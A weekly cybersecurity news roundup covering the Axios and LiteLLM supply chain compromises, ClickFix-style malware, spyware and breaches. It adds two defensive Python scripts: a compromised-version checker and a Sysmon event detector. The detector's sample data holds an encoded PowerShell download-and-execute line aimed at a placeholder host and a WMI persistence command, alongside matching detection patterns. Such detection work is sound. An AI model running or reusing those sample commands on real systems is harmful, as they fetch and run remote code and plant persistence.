Weekly Cybersecurity News: Increased Focus on Supply Chain And Credentials To Expand Access
This week’s cybersecurity activity shows a clear focus on gaining access and visibility inside systems, with supply chain attacks, credential theft, and spyware.
From fileless malware to phishing, threat actors went after developer environments and enterprise data and ran narrowly targeted operations. The incidents point to exploitation of trusted platforms and third-party services, which grants access while lowering the chance of detection.
Small Businesses Increase AI Use Amid Planning Gaps
A report based on a survey of 400 U.S. small business leaders found that 62% of SMBs use artificial intelligence in daily operations and that 67% expect their AI usage to grow over the next year. Many businesses see AI as a way to compete with larger companies, but gaps in planning and internal alignment are affecting how it is implemented. The report also shows that 84% of SMBs are willing to rely on external advisors for implementation, reflecting a strong dependence on outside expertise for secure and effective AI deployment.
Axios Supply Chain Attack Infects npm Packages
A supply chain attack on the Axios JavaScript library was confirmed after threat actors compromised the npm account of a core maintainer and published malicious package versions. The attackers added a rogue dependency to Axios versions 1.14.1 and 0.30.4; its postinstall script ran automatically whenever either version was installed. That script deployed a cross-platform remote access trojan for macOS, Windows, and Linux, which contacted a command-and-control server to fetch and execute a platform-specific payload and then deleted itself to remove traces. Because the code ran at install time, any developer machine or CI runner that installed those versions should be treated as compromised and its credentials rotated, and projects should pin to an unaffected release.
DeepLoad Malware Campaign Deploys Credential Theft Payload
A new malware campaign uses the ClickFix social engineering technique to trick users into executing malicious PowerShell commands, enabling initial access to enterprise systems. The attack chain relies on mshta.exe to download an obfuscated loader that executes primarily in memory, reducing detection by traditional security tools. Once deployed, the DeepLoad malware establishes persistence using Windows Management Instrumentation mechanisms that can trigger reinfection even after apparent remediation. The payload performs credential theft by capturing stored passwords and active user sessions, continuing even if the primary loader is blocked. Researchers indicate the malware likely uses AI-assisted obfuscation.
LiteLLM Supply Chain Attack Spreads Malware Across AI Ecosystem
A supply chain attack compromised the widely used LiteLLM Python library, allowing attackers to distribute credential-stealing malware through malicious package versions. Security researchers confirmed that versions 1.82.7 and 1.82.8 contained hidden payloads designed to harvest API keys, SSH credentials, and cloud tokens from affected systems. The breach was traced to a broader campaign attributed to the TeamPCP threat group, which previously targeted tools such as the Trivy security scanner to obtain privileged access. Because LiteLLM is deeply embedded in many AI development stacks, the malicious code reached thousands of environments as a transitive dependency, without anyone installing it directly.
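As an added example (not code from the Axios or LiteLLM projects, nor from the researchers who reported the incidents), the following Python script checks an npm package-lock.json and a `pip freeze` listing against the versions named in this entry and in the Axios entry above. It also lists every npm dependency the lockfile marks with hasInstallScript, since an install-time RAT like the Axios one needs exactly that hook. The lockfile, the freeze output, and the package example-postinstall-helper are constructed for illustration.

```python
"""Check an npm lockfile and a pip freeze listing for the package versions named
in this roundup, and list npm dependencies that run install-time scripts.

Added example, not code from Axios or LiteLLM. Sample inputs are constructed.
"""
import json
import re

# Malicious versions named in the roundup, keyed by ecosystem and package name.
COMPROMISED = {
    "npm": {"axios": {"1.14.1", "0.30.4"}},
    "pypi": {"litellm": {"1.82.7", "1.82.8"}},
}

# Constructed package-lock.json (lockfileVersion 3 layout), not from a real project.
# "example-postinstall-helper" is a hypothetical package that exists only to show
# the hasInstallScript check; npm sets that flag on packages with lifecycle scripts.
SAMPLE_PACKAGE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/axios/node_modules/example-postinstall-helper": {
            "version": "0.3.0", "hasInstallScript": True},
        "node_modules/follow-redirects": {"version": "1.15.9"},
    },
})

# Constructed `pip freeze` output, not from a real environment.
SAMPLE_PIP_FREEZE = """\
certifi==2025.1.31
LiteLLM==1.82.8
openai==1.66.0
requests==2.32.3
"""


def _npm_name(path: str) -> str:
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b' (nested installs included)."""
    return path.rsplit("node_modules/", 1)[-1]


def find_compromised_npm(lock_text: str) -> list:
    """Return sorted (name, version) pairs in the lockfile that match the npm blocklist."""
    packages = json.loads(lock_text).get("packages", {})
    hits = []
    for path, meta in packages.items():
        if not path:                 # "" is the root project entry, not a dependency
            continue
        name, version = _npm_name(path), meta.get("version", "")
        if version in COMPROMISED["npm"].get(name, set()):
            hits.append((name, version))
    return sorted(hits)


def install_script_packages(lock_text: str) -> list:
    """Return every dependency npm recorded as having an install script.

    A package that wants to run code at install time (as the rogue Axios
    dependency did) needs such a script, so this is the review list before `npm ci`.
    """
    packages = json.loads(lock_text).get("packages", {})
    return sorted(_npm_name(p) for p, m in packages.items()
                  if p and m.get("hasInstallScript"))


def find_compromised_pip(freeze_text: str) -> list:
    """Return sorted (name, version) pairs from `pip freeze` output on the PyPI blocklist."""
    hits = []
    for line in freeze_text.splitlines():
        m = re.match(r"^([A-Za-z0-9_.\-]+)==([^\s;]+)", line.strip())
        if not m:
            continue                 # editable installs, comments, VCS URLs: not pinned == lines
        name = re.sub(r"[-_.]+", "-", m.group(1)).lower()   # PEP 503 name normalisation
        if m.group(2) in COMPROMISED["pypi"].get(name, set()):
            hits.append((name, m.group(2)))
    return sorted(hits)


if __name__ == "__main__":
    print("npm blocklist hits:", find_compromised_npm(SAMPLE_PACKAGE_LOCK))
    print("npm packages with install scripts:", install_script_packages(SAMPLE_PACKAGE_LOCK))
    print("pip blocklist hits:", find_compromised_pip(SAMPLE_PIP_FREEZE))
```

In a real pipeline, feed it the project's own package-lock.json and the output of `pip freeze`, and run `npm ci --ignore-scripts` in CI so that lifecycle scripts do not execute until the install-script list has been reviewed. The blocklist is only as good as the advisories behind it; the install-script listing is the part that also catches the next compromised package.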
End Of The Line: NSW Police Crack $80 Million Dark Web Drug Empire
A long-running online drug operation worth millions has been dismantled by Australian police, exposing a hidden network that operated in plain sight on the internet. Investigators traced how drugs were sold through secretive online platforms, allowing transactions to happen without physical contact. A 38-year-old suspect was arrested in Sydney, and raids uncovered cash, narcotics, and devices linked to the operation. The case shows how digital tools can be exploited to run illegal businesses at scale while staying out of view. For everyday people, it highlights that these underground markets are not as untouchable as they may seem. Authorities have charged multiple individuals and are continuing to examine digital evidence to identify others involved.
Malicious Code Found in Axios Library Compromise
A widely used software library relied on by developers worldwide was compromised, exposing systems that pulled the poisoned updates to hidden malware. Attackers gained access to a maintainer's account and inserted a malicious component into Axios, which applications commonly use to make HTTP requests. Once installed, the malware enabled unauthorized access, allowing attackers to run commands and extract sensitive system data without detection. It was designed to be especially stealthy, deleting itself after execution and restoring clean files to avoid raising alarms. Given Axios' massive usage across modern apps and services, the impact potentially extends to a vast number of organizations and users.
WhatsApp Spyware Alert: Fake App Targets Users In Italy
WhatsApp has warned around 200 users, mostly in Italy, after discovering a malicious iOS app disguised as its official platform. The fake application was designed to infiltrate devices and extract sensitive data without users realizing the breach. Affected users were logged out of their accounts immediately to stop further data access and were notified about the risks. The spyware appears to have been distributed outside official app stores, increasing the likelihood of targeted delivery rather than mass spread. The incident adds to a pattern of spyware campaigns using fake apps to compromise devices and monitor communications.
Cisco Reviews Security Incident Following Claims Linked To Trivy Exposure
Cisco is examining reports of a security incident after threat actors claimed access to internal systems and sensitive data. The claims suggest that exposed credentials tied to a third-party Trivy dependency may have enabled unauthorized entry into development environments. Such supply chain issues can lead to access to cloud resources, repositories, and internal tools if not contained quickly. The alleged data includes references to Salesforce records and cloud assets, though the full scope remains unverified. Investigations are ongoing, with no confirmed statement detailing the extent of impact or data exposure. The situation highlights the continued scrutiny of software supply chains and credential management.
Apple Issues Security Update For Older Devices To Address Web-Based Exploit Risks
Apple has released iOS 18.7.7 and iPadOS 18.7.7 to address a critical vulnerability affecting older iPhones and iPads. The issue is tied to a web-based exploit framework known as DarkSword, which can be triggered when users visit compromised websites. Security researchers indicate that such exploits can access sensitive data including messages, location details, and digital assets. The update is aimed at users who have not transitioned to newer iOS versions, ensuring continued protection for legacy devices. Reports suggest that the exploit toolkit, once limited in scope, may now pose broader risks following its exposure. Apple has advised users to update their devices promptly and consider additional protections such as Lockdown Mode.
Phishing Relying on GitHub for Stealthy System Intrusions
Security researchers have identified a phishing campaign targeting organizations in South Korea that uses deceptive shortcut files to initiate multi-stage intrusions. The attack chain begins with malicious LNK files that execute encoded PowerShell scripts while presenting decoy documents. Once triggered, the malware establishes persistence and collects system-level information from compromised environments. The operation uses GitHub as a command and control channel, allowing data transmission through legitimate encrypted connections. This approach helps the activity blend into normal network traffic.
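As an added example that is not the researchers' own detection logic, the following Python script scores Sysmon-style process-creation events for the chains described in this entry and in the DeepLoad entry above: mshta.exe loading a remote script, PowerShell started hidden or with an encoded command (which it decodes from the UTF-16LE base64 form), PowerShell spawned by mshta.exe or by explorer.exe, and WMI event-subscription persistence. Treating the WMI persistence as a permanent event subscription is an assumption about typical tradecraft, not a detail from the report; the sample events are constructed and example.invalid is a placeholder host.

```python
"""Tag Windows process-creation events for the launch chains in this roundup:
mshta.exe fetching a remote script (ClickFix), hidden or base64-encoded
PowerShell (ClickFix and LNK phishing) and WMI event-subscription persistence.

Added example, not the researchers' detection logic. Events use the Sysmon
Event ID 1 field names ParentImage, Image and CommandLine; the sample events
are constructed and example.invalid is a placeholder host.
"""
import base64
import json
import re
from typing import Optional

PS_IMAGES = ("powershell.exe", "pwsh.exe")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common spellings.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:hidden|1)\b")
REMOTE_URL = re.compile(r"(?i)\b(?:https?://|javascript:|vbscript:)")
# Assumption: the WMI persistence the text mentions is a permanent event subscription
# (filter + consumer + binding), so look for the classes and cmdlet that create one.
WMI_PERSIST = re.compile(
    r"(?i)__EventFilter|CommandLineEventConsumer|ActiveScriptEventConsumer|"
    r"__FilterToConsumerBinding|Register-WmiEvent")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> dict:
    """Tag one process-creation event; returns {'tags': [...], 'decoded': str or None}."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    is_ps = image in PS_IMAGES
    decoded = decode_encoded_command(cmd) if is_ps else None
    # Match against the decoded payload as well: the download URL usually lives there.
    visible = cmd if decoded is None else cmd + "\n" + decoded
    tags = []
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        tags.append("mshta_remote_script")
    if decoded is not None:
        tags.append("encoded_powershell")
    if is_ps and HIDDEN_FLAG.search(cmd):
        tags.append("hidden_window")
    if is_ps and parent == "mshta.exe":
        tags.append("mshta_spawned_powershell")
    if is_ps and parent == "explorer.exe" and ("encoded_powershell" in tags or "hidden_window" in tags):
        tags.append("lnk_style_launch")  # shell-launched hidden/encoded PowerShell, as from a double-clicked .lnk
    if decoded is not None and REMOTE_URL.search(decoded):
        tags.append("download_in_encoded_payload")
    if WMI_PERSIST.search(visible):
        tags.append("wmi_event_subscription")
    return {"tags": tags, "decoded": decoded}


def suspicious_events(ndjson: str) -> list:
    """Analyse newline-delimited JSON events and keep those that received a tag."""
    hits = []
    for n, line in enumerate(ndjson.splitlines(), 1):
        if not line.strip():
            continue
        ev = json.loads(line)
        result = analyse_event(ev)
        if result["tags"]:
            hits.append({"line": n, "image": _basename(ev.get("Image", "")), **result})
    return hits


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: a ClickFix chain (lines 1-3), an LNK-style launch (4) and a benign job (5).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -enc "
                    + _enc("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/loader')")},
    {"ParentImage": PS, "Image": PS,
     "CommandLine": "powershell -nop -c \"Set-WmiInstance -Namespace root/subscription "
                    "-Class __EventFilter -Arguments @{Name='upd';EventNamespace='root/cimv2';"
                    "QueryLanguage='WQL';Query='SELECT * FROM __InstanceModificationEvent'}\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -WindowStyle Hidden -EncodedCommand "
                    + _enc("Start-Process notepad.exe .\\Invoice.txt; Set-Content $env:TEMP\\s.vbs 'x'")},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
])

if __name__ == "__main__":
    for hit in suspicious_events(SAMPLE_EVENTS):
        print(hit["line"], hit["image"], hit["tags"])
```

Feed it Sysmon Event ID 1 records (or Windows 4688 events with command-line auditing enabled) exported as NDJSON. The explorer.exe rule also fires on legitimate shortcuts that start hidden scripts, so treat single tags as triage signals; the value is in the combinations, since one event that carries both an mshta.exe parent and a download inside an encoded payload is rarely benign. Decoding the payload matters because the URL, the mshta call, or the WMI subscription is usually only visible there.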
Third-Party Breach Exposes Hims & Hers Customer Data
A cybersecurity incident affecting Hims & Hers led to the exposure of customer data after attackers compromised a third-party customer support platform. The breach occurred over several days in early February 2026 and was carried out using social engineering techniques to manipulate employees into granting unauthorized access. As a result, customer support tickets containing personally identifiable information such as names and email addresses were accessed and exfiltrated. The company confirmed that core medical records were not affected, though support interactions may still contain sensitive personal context. The incident was disclosed through a regulatory filing, highlighting risks tied to external vendor integrations in healthcare systems.
Employee Pleads Guilty In Hacking And Extortion Case
A former infrastructure engineer has pleaded guilty to hacking and attempting to extort a U.S.-based industrial company. According to court documents, he used his access to the company’s network to carry out unauthorized actions that disrupted operations. These actions included deleting administrator accounts, changing passwords, and shutting down multiple servers. After causing the disruption, he sent an email demanding approximately 20 bitcoin in exchange for restoring normal operations. The incident took place in November 2023 and was later investigated by U.S. authorities, leading to a guilty plea in federal court. The case involves charges related to intentional damage to a protected computer and extortion.
Supply Chain Attacks And Credential Theft Dominate Threat Activity
Attackers consistently used software supply chains, third-party platforms, and phishing techniques to obtain credentials and establish persistence. The activity shows a pattern of targeting developer tools, cloud access points, and communication platforms.
Misuse of privileged access and insider threats continued to be addressed by law enforcement, while threat actors tricked support staff to gain unauthorized access to customer data.